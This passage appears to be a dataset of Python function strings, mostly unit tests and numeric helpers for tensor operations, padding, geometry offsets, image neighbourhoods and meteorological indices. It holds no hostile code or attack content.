19\n assert xd == 15\n assert np.all(new_array[0:5, 5] == np.array([0, 0, 0, 0, 1]))\n assert np.all(new_array[13:, 5] == np.array([1, 0, 0, 0, 0, 0]))\n assert np.all(new_array[5, 0:4] == np.array([0, 0, 1, 1]))\n assert np.all(new_array[5, 10:] == np.array([1, 1, 0, 0, 0]))", "def check_offset(self):\n\n for d in range(self.n_dmps):\n if abs(self.y0[d] - self.goal[d]) < 1e-4:\n self.goal[d] += 1e-4", "def test_simple_2d(self):\r\n a = tt.dmatrix()\r\n increment = tt.dscalar()\r\n sl1 = slice(None)\r\n sl2_end = tt.lscalar()\r\n sl2 = slice(sl2_end)\r\n\r\n for do_set in [False, True]:\r\n\r\n if do_set:\r\n resut = tt.set_subtensor(a[sl1, sl2], increment)\r\n else:\r\n resut = tt.inc_subtensor(a[sl1, sl2], increment)\r\n\r\n f = theano.function([a, increment, sl2_end], resut)\r\n\r\n val_a = numpy.ones((5, 5))\r\n val_inc = 2.3\r\n val_sl2_end = 2\r\n\r\n result = f(val_a, val_inc, val_sl2_end)\r\n\r\n expected_result = numpy.copy(val_a)\r\n if do_set:\r\n expected_result[:, :val_sl2_end] = val_inc\r\n else:\r\n expected_result[:, :val_sl2_end] += val_inc\r\n\r\n utt.assert_allclose(result, expected_result)", "def test_single_quadrant(self):", "def run_test(dim=3):\n\n traces = []\n\n for smoothing in range(10, 101, 10):\n pencilbeams = []\n num_sight_lines = 100\n\n # Construct our pencilbeams\n for ix in range(0, num_sight_lines+1):\n # Make impact parameters covering the full\n # particle in x\n x = ix / (1. * num_sight_lines) * smoothing\n \n pencilbeams.append(\n dict(x=x, y=0),\n )\n\n results = []\n for pencilbeam in pencilbeams:\n result = testsph(h=smoothing, dim=dim, **pencilbeam)\n results.append(result)\n\n # Integrate the pencilbeam weightings to find the full SPH weighting\n # This is the plane x-z from origin along +ve x-axis (sitting at y=0)\n particle_integral = integrate.trapz([x for x in results], [x['x'] for x in pencilbeams])\n \n # \"All smoothing lengths should integrate to the same value \"\n\n # We've sampled a quadrant in x-y and integrated entirely along z, so mulitply by 4\n print particle_integral * 4.\n\n traces.append(go.Scatter(y=[x for x in results], x=[y['x'] for y in pencilbeams]))\n\n # The mass of a particle should be the area under each of these curves(?)\n plot(traces)", "def segement_divide(pts,step=0.10, offset_x=0.01, offset_y=0.0):\n\n # Select the x and y of the points\n n = len(pts)\n \n z = pts[0][2]\n \n points_plane = [] \n points_x = []\n paint_point = []\n\n for i in range(n):\n points_plane.append([pts[i][0], pts[i][1]])\n \n # Sorted the list according to x \n points_plane.sort(key=lambda x:x[0])\n\n # Segment the points according to x \n counter = 0 # Count the interval\n x_min = points_plane[0][0]\n x_max = points_plane[n-1][0]\n\n # The whole interval that needs to be divided\n upper = x_max + offset_x\n lower = x_min - offset_x\n lower_bound = lower\n \n # Set each segement's lower and upperbound\n while (lower_bound + step <= upper): \n # The break condition will be lower_bound > upper - step\n upper_bound = lower_bound + step\n\n # Find the index between lower bound and upper bound\n # First, find the index which x >= lower bound\n index = 0\n \n while (points_plane[index][0] < lower_bound): \n index = index + 1 # The index of the first point in the interval\n \n # If there is at least one point in the [lower_bound, upper_bound]\n if (points_plane[index][0] <= upper_bound): \n\n x_start = points_plane[index][0]\n y_max = points_plane[index][1]\n y_min = points_plane[index][1]\n \n while (points_plane[index][0] <= upper_bound): \n # The break condition will be x[index] > upper bound or index = n - 1\n # Compute the y max and y min in this interval\n \n if points_plane[index][1] > y_max: \n y_max = points_plane[index][1]\n\n if points_plane[index][1] < y_min:\n y_min = points_plane[index][1]\n \n if index < n - 1:\n index = index + 1\n else:\n break\n # The index of the last point in the interval, when index < n-1\n \n x_end = points_plane[index][0]\n\n paint_point.append([lower_bound,y_max+offset_y,z]) \n paint_point.append([lower_bound,y_min-offset_y,z])\n points_x.append([x_start, x_end])\n \n counter = counter + 1\n\n # Update interval\n lower_bound = upper_bound - offset_x\n \n # Deal with the last interval\n lower_bound_last = upper - step\n index_last = 0\n counter = counter + 1\n while ((index_last < n) and (points_plane[index_last][0] < lower_bound_last)): \n # The first point in the last interval\n index_last = index_last + 1\n \n if (index_last < n): \n # There is at least one point in the last interval\n x_start_last = points_plane[index_last][0]\n y_max_last = points_plane[index_last][1]\n y_min_last = points_plane[index_last][1]\n\n while ((index_last)<n) and (points_plane[index_last][0] <= upper):\n\n if points_plane[index_last][1] > y_max_last: \n y_max_last = points_plane[index_last][1]\n \n if points_plane[index_last][1] < y_min_last:\n y_min_last = points_plane[index_last][1]\n\n index_last = index_last + 1\n \n index_last = index_last - 1 # The index of the last point in the interval\n \n paint_point.append([lower_bound_last, y_max_last+offset_y, z])\n paint_point.append([lower_bound_last, y_min_last-offset_y, z])\n# paint_point.append([upper, y_max_last+offset_y, z])\n# paint_point.append([upper, y_min_last-offset_y, z])\n# return trans_to_end(paint_point)\n return paint_point", "def test_scaffold_filtering(self, n_test_points=100):\n device = \"cuda\"\n func = self._get_simple_implicit_function().to(device)\n\n def scaffold(points):\n \"\"\"'\n Function to deterministically and randomly enough assign a point\n to empty or occupied space.\n Return 1 if second digit of sum after 0 is odd else 0\n \"\"\"\n return (\n ((points.sum(dim=-1, keepdim=True) * 10**2 % 10).long() % 2) == 1\n ).float()\n\n def new_density(points):\n # check if all passed points should be passed here\n assert torch.all(scaffold(points)), (scaffold(points), points.shape)\n return points.sum(dim=-1, keepdim=True)\n\n def new_color(points, camera, directions, non_empty_points, num_points_per_ray):\n # check if all passed points should be passed here\n assert torch.all(scaffold(points)) # , (scaffold(points), points)\n return points * 2\n\n # check both computation paths that they contain only points\n # which are not in empty space\n func._get_density = new_density\n func._get_color = new_color\n func.voxel_grid_scaffold.forward = scaffold\n func._scaffold_ready = True\n\n bundle = ImplicitronRayBundle(\n origins=torch.rand((n_test_points, 2, 1, 3), device=device),\n directions=torch.rand((n_test_points, 2, 1, 3), device=device),\n lengths=torch.rand((n_test_points, 2, 1, 4), device=device),\n xys=None,\n )\n points = ray_bundle_to_ray_points(bundle)\n result_density, result_color, _ = func(bundle)\n\n # construct the wanted result 'by hand'\n flat_points = points.view(-1, 3)\n expected_result_density, expected_result_color = [], []\n for point in flat_points:\n if scaffold(point) == 1:\n expected_result_density.append(point.sum(dim=-1, keepdim=True))\n expected_result_color.append(point * 2)\n else:\n expected_result_density.append(point.new_zeros((1,)))\n expected_result_color.append(point.new_zeros((3,)))\n expected_result_density = torch.stack(expected_result_density, dim=0).view(\n *points.shape[:-1], 1\n )\n expected_result_color = torch.stack(expected_result_color, dim=0).view(\n *points.shape[:-1], 3\n )\n\n # check that thre result is expected\n assert torch.allclose(result_density, expected_result_density), (\n result_density,\n expected_result_density,\n )\n assert torch.allclose(result_color, expected_result_color), (\n result_color,\n expected_result_color,\n )", "def test_offsets():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n sections2 = ((B, H, 12.435, E),)\n EI, top, bot = bm.EI(sections, E)\n EI2, top2, bot2 = bm.EI(sections2, E)\n assert 0.99 < EI / EI2 < 1.01\n assert 0.99 < top / top2 < 1.01\n assert 0.99 < bot / bot2 < 1.01", "def test_point_within_dimensions_border():\n point = np.array([100, 20])\n image_dimensions = np.array([100, 100])\n assert not point_within_dimensions(point, image_dimensions)", "def test_advinc_subtensor1():\r\n for shp in [(3, 3), (3, 3, 3)]:\r\n shared = cuda.shared_constructor\r\n xval = numpy.arange(numpy.prod(shp), dtype='float32').reshape(shp) + 1\r\n yval = numpy.empty((2,) + shp[1:], dtype='float32')\r\n yval[:] = 10\r\n x = shared(xval, name='x')\r\n y = T.tensor(dtype='float32',\r\n broadcastable=(False,) * len(shp),\r\n name='y')\r\n expr = T.advanced_inc_subtensor1(x, y, [0, 2])\r\n f = theano.function([y], expr, mode=mode_with_gpu)\r\n assert sum([isinstance(node.op, cuda.GpuAdvancedIncSubtensor1)\r\n for node in f.maker.fgraph.toposort()]) == 1\r\n rval = f(yval)\r\n rep = xval.copy()\r\n rep[[0, 2]] += yval\r\n assert numpy.allclose(rval, rep)", "def test(p):\n while p.quadrant() != TOP_RIGHT_QUAD:\n if p.x < 0:\n p = p.reflect_y()\n else:\n p = p.reflect_x()\n return p", "def wiggle_breakpoints(y, xi, segment_bdy3, wiggle_width=5, num_iterations=1,\n verbose=False, log_func=sys.stdout.write):\n t0 = time.time()\n count = 0\n segment_bdy4 = map(tuple, segment_bdy3)\n while count < num_iterations:\n did_nothing = True\n bps = [x[0] for x in segment_bdy4] + [segment_bdy4[-1][1]]\n new_bps = [0]\n for index in xrange(1, len(bps)-1):\n b = bps[index]\n lpos = new_bps[index-1]\n rpos = bps[index+1]\n\n wiggle_width = 5\n if b - lpos == 1 or rpos - b == 1:\n new_bps.append(b)\n continue\n lwiggle = max(b-wiggle_width, lpos+1)\n rwiggle = min(b+wiggle_width, rpos-1)\n delta_lls = []\n for pos in xrange(lwiggle, rwiggle):\n lpts = y[lpos:pos]\n rpts = y[pos:rpos]\n allpts = y[lpos:rpos]\n\n lxi = xi[lpos:pos]\n rxi = xi[pos:rpos]\n allxi = xi[lpos:rpos]\n\n mu_l = np.clip(lpts.sum( )/lxi.sum( ), 1e-2, None)*lxi\n mu_r = np.clip(rpts.sum( )/rxi.sum( ), 1e-2, None)*rxi\n mu_all = np.clip(allpts.sum( )/allxi.sum( ), 1e-2, None)*allxi\n\n delta_ll = ((-mu_l + lpts*np.log(mu_l)).sum( ) +\n (-mu_r + rpts*np.log(mu_r)).sum( ) -\n (-mu_all + allpts*np.log(mu_all)).sum( ))\n delta_lls.append(delta_ll)\n new_b = lwiggle + np.argmax(delta_lls)\n try:\n gain = (delta_lls[new_b-lwiggle] - delta_lls[b-lwiggle])\n except:\n print \"-\"*40\n print lpos, b, rpos\n print \"argmax\", np.argmax(delta_lls), len(delta_lls)\n print \"wiggle\", lwiggle, rwiggle\n print new_b-lwiggle, b-lwiggle\n raise Exception(\"Wiggling breakpoints produced an invalid breakpoint configuration\")\n new_bps.append(new_b)\n if new_b != b:\n did_nothing = False\n if verbose:\n print \"%6d -> %6d : (%2d) gain +%.2f\"%(b, new_b, delta_lls[b-lwiggle], gain)\n new_bps.append(bps[-1])\n assert len(new_bps) == len(bps)\n segment_bdy4 = [(new_bps[i], new_bps[i+1]) for i in xrange(0, len(new_bps)-1)]\n count += 1\n if did_nothing:\n break\n log_func(\"%.2f s spent wiggling, %d iterations\\n\"%(time.time()-t0, count))\n return segment_bdy4", "def test_sinc_array():\n x,sc = cw04.gen_sinc_array(1,3,3)\n desired = ([0.8414709848078965, .45464871 , 0.04704000])\n print(\"Obtained:\",sc)\n print(\"Desired:\",desired)\n # For comparing floating point values, nose has useful helper functions\n # to ensure they are equal up to a numerical precision tolerance\n np.testing.assert_almost_equal(sc, desired)", "def test_get_xy_space():\n pass", "def layer_offsets(self):\n ...", "def inner_perimeter(c, stencil=nn_stencil):\n\n return np.logical_and(c, coordination(c, stencil=stencil) < len(stencil))", "def offset(x, y, L):\n length = x.size\n offsetx = np.zeros((length, 2))\n offsety = np.zeros((length, 2))\n dx = np.zeros(length-1)\n dy = np.zeros(length-1)\n dxL = np.zeros(length-1)\n dyL = np.zeros(length-1)\n xl = np.zeros(length) # counterclockwise\n xr = np.zeros(length) # clockwise\n yl = np.zeros(length)\n yr = np.zeros(length)\n xl0 = np.zeros(length)\n xr0 = np.zeros(length)\n yl0 = np.zeros(length)\n yr0 = np.zeros(length) \n for i in range(0, length-1):\n dx[i] = x[i+1]-x[i]\n dy[i] = y[i+1]-y[i]\n for i in range(0, length-1):\n r = np.sqrt(dx[i]**2 + dy[i]**2)\n dxL[i] = dx[i]*L/r\n dyL[i] = dy[i]*L/r\n xl0[i] = -dyL[i] + x[i]\n yl0[i] = dxL[i] + y[i]\n xr0[i] = dyL[i] + x[i]\n yr0[i] = -dxL[i] + y[i]\n xl0[length-1] = xl0[length-2] + dx[length-2]\n yl0[length-1] = yl0[length-2] + dy[length-2]\n xr0[length-1] = xr0[length-2] + dx[length-2]\n yr0[length-1] = yr0[length-2] + dy[length-2]\n xl[0] = xl0[0]\n yl[0] = yl0[0]\n xl[length-1] = xl0[length-1]\n yl[length-1] = yl0[length-1]\n xr[0] = xr0[0]\n yr[0] = yr0[0]\n xr[length-1] = xr0[length-1]\n yr[length-1] = yr0[length-1]\n for i in range(1, length-1):\n a = np.array([[dy[i-1], -dx[i-1]], [dy[i], -dx[i]]])\n bl = np.array([dy[i-1]*xl0[i-1]-dx[i-1]*yl0[i-1], dy[i]*xl0[i]-dx[i]*yl0[i]])\n br = np.array([dy[i-1]*xr0[i-1]-dx[i-1]*yr0[i-1], dy[i]*xr0[i]-dx[i]*yr0[i]])\n theta = (dx[i-1]*dx[i]+dy[i-1]*dy[i])/(dx[i-1]**2+dy[i-1]**2)**0.5/(dx[i]**2+dy[i]**2)**0.5\n if theta > 1 - 1e-10:\n xl[i] = xl0[i]\n yl[i] = yl0[i]\n xr[i] = xr0[i]\n yr[i] = yr0[i]\n else:\n pl = np.linalg.solve(a, bl)\n xl[i] = pl[0]\n yl[i] = pl[1]\n pr = np.linalg.solve(a, br)\n xr[i] = pr[0]\n yr[i] = pr[1]\n offsetx[:, 0], offsetx[:, 1] = xl, xr\n offsety[:, 0], offsety[:, 1] = yl, yr\n return offsetx, offsety", "def sample_pin_position_range():\n #Create a sample goniometer\n g = TopazInHouseGoniometer()\n\n #Initialize the leg limits\n g.relative_sample_position = column([0.0, 0.0, 0.0])\n g.getplatepos(0.0, 0.0, 0.0)\n g.calculate_leg_xy_limits(visualize=True)\n\n# if True:\n# pylab.show()\n# return\n\n n = 17\n positions = np.linspace(-8, 8, n) #Range calculated in mm\n allowed = np.zeros( (n,n,n) )\n for (ix, x) in enumerate(positions):\n print \"Calculating x\", x\n for (iy, y) in enumerate(positions):\n for (iz, z) in enumerate(positions):\n #Set up\n g.relative_sample_position = column([x, y, z])\n allowed[ix,iy,iz] = g.are_angles_allowed([0., 0., 0.], return_reason=False)\n\n #Do a plot\n\n pylab.figure(1, figsize=[15,15])\n pylab.title(\"Allowable XZ sample positions\")\n for (iy, y) in enumerate(positions):\n print \"At y of\", y, \", # of points = \", np.sum( allowed[:, iy,:])\n if iy < 16:\n pylab.subplot(4,4,iy+1)\n pylab.pcolor(positions, positions, allowed[:, iy, :].transpose(), norm=pylab.Normalize(0, 1))\n pylab.xlabel(\"x\")\n pylab.ylabel(\"z\")\n pylab.title(\"y = %.3f mm\" % y)\n pylab.draw()\n pylab.axis('equal')\n pylab.show()\n #pylab.", "def test_elemwise4():\r\n\r\n shape = (3, 4)\r\n a = tcn.shared_constructor(theano._asarray(numpy.random.rand(*shape),\r\n dtype='float32'), 'a')\r\n b = tensor.fvector()\r\n c = tensor.fvector()\r\n f = pfunc([b, c], [],\r\n updates=[(a, (a + b.dimshuffle('x', 0) * c.dimshuffle(0, 'x')))],\r\n mode=mode_with_gpu)\r\n has_elemwise = False\r\n for i, node in enumerate(f.maker.fgraph.toposort()):\r\n has_elemwise = has_elemwise or isinstance(node.op, tensor.Elemwise)\r\n assert not has_elemwise\r\n #let debugmode catch errors\r\n f(theano._asarray(numpy.random.rand(4), dtype='float32'),\r\n theano._asarray(numpy.random.rand(3), dtype='float32'))", "def test_pointnum3():\n shape = paramak.CapsuleVacuumVessel(outer_start_point=(1000, -500), radius=5000, thickness=50)\n assert len(shape.points) == 12\n assert len(shape.processed_points) == 13", "def outconvex2d(x, p)->int:\r\n\r\n n = np.shape(p)[1]\r\n\r\n # form A, B such that internal points satisfy Ax <= B\r\n A = np.array([[p[1, 1:n] - p[1, 0:n-1]],\r\n [p[0, 0:n-1] - p[0, 1:n]]]).T\r\n\r\n B = np.zeros((n-1, 1))\r\n\r\n for i in range(n-1):\r\n B[i] = A[i, :] * p[:, i]\r\n \r\n out = np.sum(A*x > np.tile(B[:, 0], (1, np.shape(x)[1])))", "def test_get_debug_values_success():\r\n\r\n prev_value = config.compute_test_value\r\n for mode in ['ignore', 'warn', 'raise']:\r\n\r\n try:\r\n config.compute_test_value = mode\r\n\r\n x = T.vector()\r\n x.tag.test_value = numpy.zeros((4,), dtype=config.floatX)\r\n y = numpy.zeros((5, 5))\r\n\r\n iters = 0\r\n\r\n for x_val, y_val in op.get_debug_values(x, y):\r\n\r\n assert x_val.shape == (4,)\r\n assert y_val.shape == (5, 5)\r\n\r\n iters += 1\r\n\r\n assert iters == 1\r\n\r\n finally:\r\n config.compute_test_value = prev_value", "def test052_2d_numerical_comparison_on_vs_np_mp(\n self,\n batch_size=8,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125\n\n tf.keras.backend.set_floatx('float16')\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n dtype=Policy('infer_float32_vars'),\n )", "def check_ext(im, i, j):\n neighb = 0\n count = 0\n for a in range(8):\n if (im[i+relpos[a][0], j+relpos[a][1]] and (count == 0)):\n count += 1\n neighb += 1\n else:\n count = 0\n return (neighb < 2)", "def test_endpoint_slope(b,c,d,x_n_minus_1,x_n,expected_slope):\n\tactual_slope = b + 2*c*(x_n-x_n_minus_1) + 3*d*(x_n-x_n_minus_1)**2\n\tresult = abs(actual_slope-expected_slope)<0.001\n\treturn(result)", "def test_sipm_indx(mc_sns_sipm_map):\n XL = mc_sns_sipm_map.sipm_map.xl.values\n XR = mc_sns_sipm_map.sipm_map.xr.values\n YU = mc_sns_sipm_map.sipm_map.yu.values\n YD = mc_sns_sipm_map.sipm_map.yd.values\n\n DX = [xr - xl if xl != NN and xr != NN else 2 for xl,xr in zip(XL, XR) ]\n t1 = np.allclose(DX, 2, rtol=1e-03, atol=1e-03)\n return t1", "def test_local_useless_inc_subtensor_increment_zeros():\n y = matrix(\"y\")\n\n s = at.zeros((2, 2))[:, :]\n o_shape = inc_subtensor(s, specify_shape(y, s.shape))\n\n mode = get_default_mode().including(\"local_useless_inc_subtensor\")\n f_shape = function([y], o_shape, mode=mode)\n\n topo = f_shape.maker.fgraph.toposort()\n assert not any(isinstance(n.op, IncSubtensor) for n in topo)", "def test_pad_8():\n paddle.disable_static()\n x = np.array([[[[1.0, 3.0], [-3.0, 1.0]]]])\n pad = [1, 1, 1, 2]\n mode = \"constant\"\n value = np.array(2.0)\n data_format = \"NCHW\"\n res = np.array(\n [\n [\n [\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 1.0, 3.0, 2.0],\n [2.0, -3.0, 1.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n ]\n ]\n ]\n )\n exp = paddle.nn.functional.pad(\n x=paddle.to_tensor(x), pad=pad, mode=mode, value=paddle.to_tensor(value), data_format=data_format\n )\n assert np.allclose(exp.numpy(), res)", "def pixel(self, x: int, y: int, colour: int, /) -> None:", "def _force_non_integer_offsets(dx, dy, epsilon=1e-4):\n # Copy the input offsets\n outDx = np.array(copy.deepcopy(dx), dtype=float)\n outDy = np.array(copy.deepcopy(dy), dtype=float)\n\n # Repeatedly add epsilon to the offsets until none of them are integers\n addEpsilon = True\n while addEpsilon:\n # Check for any perfectly integer shifts\n for dx1, dy1 in zip(outDx, outDy):\n # If an integer pixel shift is found, then add tiny shift and\n # try again.\n if dx1.is_integer() or dy1.is_integer():\n addEpsilon = True\n outDx += epsilon\n outDy += epsilon\n break\n else:\n # If the loop completed, then no epsilon addition necessary!\n addEpsilon = False\n\n return outDx, outDy", "def test_elemwise2():\r\n rng = numpy.random.RandomState(int(time.time()))\r\n shape = (3, 5)\r\n for pattern in [(0, 1), (1, 0)]:\r\n a = tcn.shared_constructor(theano._asarray(rng.rand(*shape),\r\n dtype='float32'), name=None)\r\n b = tensor.Tensor(dtype='float32', broadcastable=[0] * len(shape))()\r\n f = pfunc([b], [], updates=[(a, (a + b).dimshuffle(pattern))],\r\n mode=mode_with_gpu)\r\n has_elemwise = False\r\n for i, node in enumerate(f.maker.fgraph.toposort()):\r\n has_elemwise = has_elemwise or isinstance(node.op, tensor.Elemwise)\r\n assert not has_elemwise\r\n #let debugmode catch errors\r\n f(theano._asarray(rng.rand(*shape), dtype='float32') * .3)\r\n\r\n shape = (3, 4, 5, 6)\r\n a = tcn.shared_constructor(theano._asarray(rng.rand(*shape),\r\n dtype='float32'), 'a')\r\n b = tensor.Tensor(dtype='float32', broadcastable=[0] * len(shape))()\r\n f = pfunc([b], [], updates=[(a, (a + b).dimshuffle([2, 0, 3, 1]) *\r\n tensor.exp(b ** a).dimshuffle([2, 0, 3, 1]))], mode=mode_with_gpu)\r\n has_elemwise = False\r\n for i, node in enumerate(f.maker.fgraph.toposort()):\r\n has_elemwise = has_elemwise or isinstance(node.op, tensor.Elemwise)\r\n assert not has_elemwise\r\n #let debugmode catch errors\r\n f(theano._asarray(rng.rand(*shape), dtype='float32'))", "def footprint_corner_indices():", "def outer_perimeter(c, stencil=nn_stencil):\n\n return np.logical_and(np.logical_not(c),\n coordination(c, stencil=stencil) > 0)", "def test_compute_pixel_ray_directions_vectorized_invalid_focal_lengths() -> None:\n uv: NDArrayInt = np.array([[12, 2], [12, 2], [12, 2], [12, 2]])\n fx = 10\n fy = 11\n\n img_w = 20\n img_h = 10\n\n pinhole_camera = _create_pinhole_camera(\n fx_px=fx,\n fy_px=fy,\n cx_px=img_w / 2,\n cy_px=img_h / 2,\n height_px=img_h,\n width_px=img_w,\n cam_name=\"ring_front_center\", # dummy name\n )\n\n with pytest.raises(ValueError):\n pinhole_camera.compute_pixel_ray_directions(uv)", "def test_set_vx_to_vx_plus_vy(self, cpu):\n for x in range(0x0, 0xF):\n for y in range(0x0, 0xF):\n if x != y:\n cpu.opcode = 0x8004 | (x << 8) | (y << 4)\n for v1 in range(0x0, 0xFF):\n for v2 in range(0x0, 0xFF):\n cpu.V_register[x] = v1\n cpu.V_register[y] = v2\n cpu.set_vx_to_vx_plus_vy()\n value = v1 + v2\n if value > 0xFF:\n assert(cpu.V_register[0xF] == 1)\n assert(cpu.V_register[x] == value & 0xFF)\n else:\n assert(cpu.V_register[0xF] == 0)\n assert(cpu.V_register[x] == value)", "def test_distance(layout, gain_calc):\n def direct_gains(size, distance):\n block_format = AudioBlockFormatObjects(position=dict(azimuth=0, elevation=0, distance=distance),\n width=size, height=size)\n return gain_calc.render(ObjectTypeMetadata(block_format)).direct\n\n for size in [0, 30]:\n distances = np.linspace(0, 1, 10)\n pvs = np.array([direct_gains(size, distance) for distance in distances])\n ev_len = np.linalg.norm(np.square(pvs).dot(layout.norm_positions), axis=1)\n assert np.all(np.diff(ev_len) > 0)", "def at_loc((x, y), (cx, cy), eps=0.000035):\n\treturn (x - cx)**2 + (y - cy)**2 <= eps**2", "def activated_pixels_fitness(p, e):\n shape = (max(p.shape[0], e.shape[0]), max(p.shape[1], e.shape[1]))\n diff = np.zeros(shape, dtype=int)\n diff[0:p.shape[0], 0:p.shape[1]] = (p > 0).astype(int)\n diff[0:e.shape[0], 0:e.shape[1]] -= (e > 0).astype(int)\n\n return (diff != 0).sum()", "def test02(self):\n a = np.arange(self.N, dtype='uint64')\n b = bcolz.carray(a, rootdir=self.rootdir)\n c = iter(b.view())\n u = c.iter(3)\n w = b.iter(2)\n self.assertEqual(sum(a[3:]), sum(u))\n self.assertEqual(sum(a[2:]), sum(w))", "def advance(self):\n count = [[0 for col in range(self.width+2)] for row in range(self.height+2)]\n for y in range(1, self.height+1):\n for x in range(1, self.width+1):\n if self.array[y][x]:\n count[y][x-1] += 1\n count[y][x+1] += 1\n count[y-1][x-1] += 1\n count[y-1][x] += 1\n count[y-1][x+1] += 1\n count[y+1][x-1] += 1\n count[y+1][x] += 1\n count[y+1][x+1] += 1\n for y in range(1, self.height+1):\n for x in range(1, self.width+1):\n if count[y][x] == 3:\n self.array[y][x] = 1\n elif count[y][x] == 2 and self.array[y][x]:\n self.array[y][x] = 1\n else:\n self.array[y][x] = 0\n self.array[1][1] = 1\n self.array[1][self.width] = 1\n self.array[self.height][self.width] = 1\n self.array[self.height][1] = 1", "def test032_2d_numerical_comparison_on_vs_np(\n self,\n batch_size=8,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n )", "def test_local_useless_inc_subtensor_no_opt():\n x = matrix(\"x\")\n y = matrix(\"y\")\n\n s = x[:, ::2]\n o_shape = set_subtensor(s, specify_shape(y, s.shape))\n\n mode = get_default_mode().including(\"local_useless_inc_subtensor\")\n f_shape = function([x, y], o_shape, mode=mode)\n\n topo = f_shape.maker.fgraph.toposort()\n assert any(isinstance(n.op, IncSubtensor) for n in topo)\n\n out = f_shape([[2, 3, 6, 7]], [[8, 9]])\n assert np.array_equal(out, np.asarray([[8, 3, 9, 7]]))\n\n # This is an increment with a non-constant target array\n s = x[:, :]\n o_shape = inc_subtensor(s, specify_shape(y, s.shape))\n\n f_shape = function([x, y], o_shape, mode=mode)\n\n topo = f_shape.maker.fgraph.toposort()\n assert any(isinstance(n.op, IncSubtensor) for n in topo)\n\n # This is an increment with a non-zero target array\n s = at.ones((2, 2))[:, :]\n o_shape = inc_subtensor(s, specify_shape(y, s.shape))\n\n f_shape = function([y], o_shape, mode=mode)\n\n topo = f_shape.maker.fgraph.toposort()\n assert any(isinstance(n.op, IncSubtensor) for n in topo)", "def test_sweat_index():\n pressure = np.array([1008., 1000., 947., 925., 921., 896., 891., 889., 866.,\n 858., 850., 835., 820., 803., 733., 730., 700., 645.,\n 579., 500., 494., 466., 455., 441., 433., 410., 409.,\n 402., 400., 390., 388., 384., 381., 349., 330., 320.,\n 306., 300., 278., 273., 250., 243., 208., 200., 196.,\n 190., 179., 159., 151., 150., 139.]) * units.hPa\n temperature = np.array([27.4, 26.4, 22.9, 21.4, 21.2, 20.7, 20.6, 21.2, 19.4,\n 19.1, 18.8, 17.8, 17.4, 16.3, 11.4, 11.2, 10.2, 6.1,\n 0.6, -4.9, -5.5, -8.5, -9.9, -11.7, -12.3, -13.7, -13.8,\n -14.9, -14.9, -16.1, -16.1, -16.9, -17.3, -21.7, -24.5, -26.1,\n -28.3, -29.5, -33.1, -34.2, -39.3, -41., -50.2, -52.5, -53.5,\n -55.2, -58.6, -65.2, -68.1, -68.5, -72.5]) * units.degC\n dewpoint = np.array([24.9, 24.6, 22., 20.9, 20.7, 14.8, 13.6, 12.2, 16.8,\n 16.6, 16.5, 15.9, 13.6, 13.2, 11.3, 11.2, 8.6, 4.5,\n -0.8, -8.1, -9.5, -12.7, -12.7, -12.8, -13.1, -24.7, -24.4,\n -21.9, -24.9, -36.1, -31.1, -26.9, -27.4, -33., -36.5, -47.1,\n -31.4, -33.5, -40.1, -40.8, -44.1, -45.6, -54., -56.1, -56.9,\n -58.6, -61.9, -68.4, -71.2, -71.6, -77.2]) * units.degC\n speed = np.array([0., 3., 10., 12., 12., 14., 14., 14., 12.,\n 12., 12., 12., 11., 11., 12., 12., 10., 10.,\n 8., 5., 4., 1., 0., 3., 5., 10., 10.,\n 11., 11., 13., 14., 14., 15., 23., 23., 24.,\n 24., 24., 26., 27., 28., 30., 25., 24., 26.,\n 28., 33., 29., 32., 26., 26.]) * units.knot\n direction = np.array([0., 170., 200., 205., 204., 200., 197., 195., 180.,\n 175., 175., 178., 181., 185., 160., 160., 165., 165.,\n 203., 255., 268., 333., 0., 25., 40., 83., 85.,\n 89., 90., 100., 103., 107., 110., 90., 88., 87.,\n 86., 85., 85., 85., 60., 55., 60., 50., 46.,\n 40., 45., 35., 50., 50., 50.]) * units.degree\n\n sweat = sweat_index(pressure, temperature, dewpoint, speed, direction)\n assert_almost_equal(sweat, 227., 2)", "def numZeroesAround(imgArray, (x, y)):\n\tnum = 0\n\tfor x_r in range(-1, 2):\n\t\tfor y_r in range(-1, 2):\n\t\t\tif x_r != 0 or y_r != 0:\n\t\t\t\tif imgArray[x + x_r][y + y_r] == (0, 0, 0, 255):\n\t\t\t\t\tnum += 1\n\n\treturn num", "def test_synth_positions_small_width():\n background = Image.new('RGB', (20, 20))\n patch_1 = Image.new('RGB', (10, 20))\n patch_2 = Image.new('RGB', (11, 20))\n\n parameters = {'data': [background, patch_1, patch_2]}\n\n positions = images.synth_positions(parameters)", "def test06(self):\n a = np.arange(1, 11) > 5\n b = bcolz.carray(a)\n wt = a.nonzero()[0].tolist()[2:4]\n cwt = [i for i in b.wheretrue(skip=2, limit=2)]\n # print \"numpy ->\", a.nonzero()[0].tolist()[2:4]\n # print \"where ->\", [i for i in b.wheretrue(limit=2,skip=2)]\n self.assertTrue(wt == cwt, \"wheretrue() does not work correctly\")", "def test_lifted_index_xarray(index_xarray_data):\n result = lifted_index(index_xarray_data.isobaric, index_xarray_data.temperature,\n index_xarray_data.profile)\n assert_array_almost_equal(result, np.full((1, 1, 2, 3), 7) * units.delta_degC)", "def test_pad():\n x = randtool(\"float\", -10, 10, [3, 2, 1, 2])\n pad = [1, 1, 2, 3]\n mode = \"constant\"\n value = 2.0\n data_format = \"NCHW\"\n res = np.array(\n [\n [\n [\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 